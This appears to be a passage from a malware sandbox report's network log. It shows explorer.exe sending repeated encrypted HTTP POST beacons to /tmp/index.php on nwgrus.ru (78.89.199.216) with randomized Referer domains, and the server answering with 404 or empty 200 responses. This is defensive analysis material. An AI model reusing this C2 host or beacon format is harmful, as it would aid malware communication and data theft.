                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:48.098006964 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qtrqfgpakuyxgovn.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 262
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:48.098058939 CEST262OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 39 5e bd aa
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu9^c5Va\a2A5rQYZ|l}7WRDD_3^caf:Nofk/r(A<oYLT'#IeE-|ecvaG+
                                    Oct 13, 2024 17:02:49.323573112 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:49 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.44974978.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:49.380553007 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://cmqaenxsxeyowd.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 196
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:49.380609989 CEST196OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 44 3e e0 9b
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuD>_cc7EwN%b,rAuEZ.#TX.)<VLVLG%HxGDJn6lC_
                                    Oct 13, 2024 17:02:50.630939007 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:50 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.44975078.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:50.639411926 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://rpyskssnoppwv.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 290
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:50.639473915 CEST290OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7a 2b cd 97
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuz+mla[Z!6/:OtSV-)TJ{ZgKKO5'E'GAt!B2kQIP3EP%GaGz
                                    Oct 13, 2024 17:02:51.846788883 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:51 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.44975178.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:51.857182026 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://uspdxnihexd.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 202
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:51.857182026 CEST202OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 62 21 eb ba
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vub!szMg5*,]9Fs>Aq?/$<Rw'WkP3{?c/dhB>hI
                                    Oct 13, 2024 17:02:53.051822901 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:52 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.44975278.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:53.060765028 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://fljiwnmgncpvmdu.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 234
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:53.060798883 CEST234OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 66 1c c2 f8
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vufHNmHF|iv6;`jGU;S"KAO&%QII7r+y]p3(h|;xI=N=ixb8U+L0
                                    Oct 13, 2024 17:02:54.269166946 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:54 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.44975378.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:54.277864933 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://hbbbwgrmtjdu.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 234
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:54.277901888 CEST234OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 30 25 c2 aa
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu0%}ZGnSu~a+"?z[6Tz~Y*EZ@;b`EK14<6H?mk|pCP(]I`;ea0
                                    Oct 13, 2024 17:02:55.482976913 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.44975478.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:55.490760088 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://yhuliplstnjp.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 173
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:55.490760088 CEST173OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 21 5a a8 f1
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu!Z8f_~;aQ]C q[`ynP+Yqp_4F2RA</
                                    Oct 13, 2024 17:02:56.675520897 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:56 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.44975678.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:56.685101032 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://hiodckefgdl.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 131
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:56.685101986 CEST131OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 56 40 df bc
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuV@<Vf%[=^>21@ATE
                                    Oct 13, 2024 17:02:58.136038065 CEST137INHTTP/1.1 200 OK
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:57 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.44976878.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:58.144890070 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://cttvtshacog.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 228
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:58.144921064 CEST228OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 42 1b a3 fe
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuBTc"g2`,#l]nG7M[P-IZK,; uyFXz!s6F#nj1Cnl}P
                                    Oct 13, 2024 17:02:59.375215054 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:59 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.44977478.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:59.385839939 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://baalviblkbjsp.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 160
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:59.385839939 CEST160OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 5e 1b ed a5
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu^G[}_nKzL?;q2[AEa>#[o129E
                                    Oct 13, 2024 17:03:00.567207098 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:00 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.44978578.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:00.580315113 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gwngaiusekur.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 286
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:00.583970070 CEST286OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 66 2d c8 82
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuf-^KUZZ e6g{<{G"Uxn>/xc4^+f&%%AE"W_NH}ch@vX0_-y!8m
                                    Oct 13, 2024 17:03:01.794980049 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
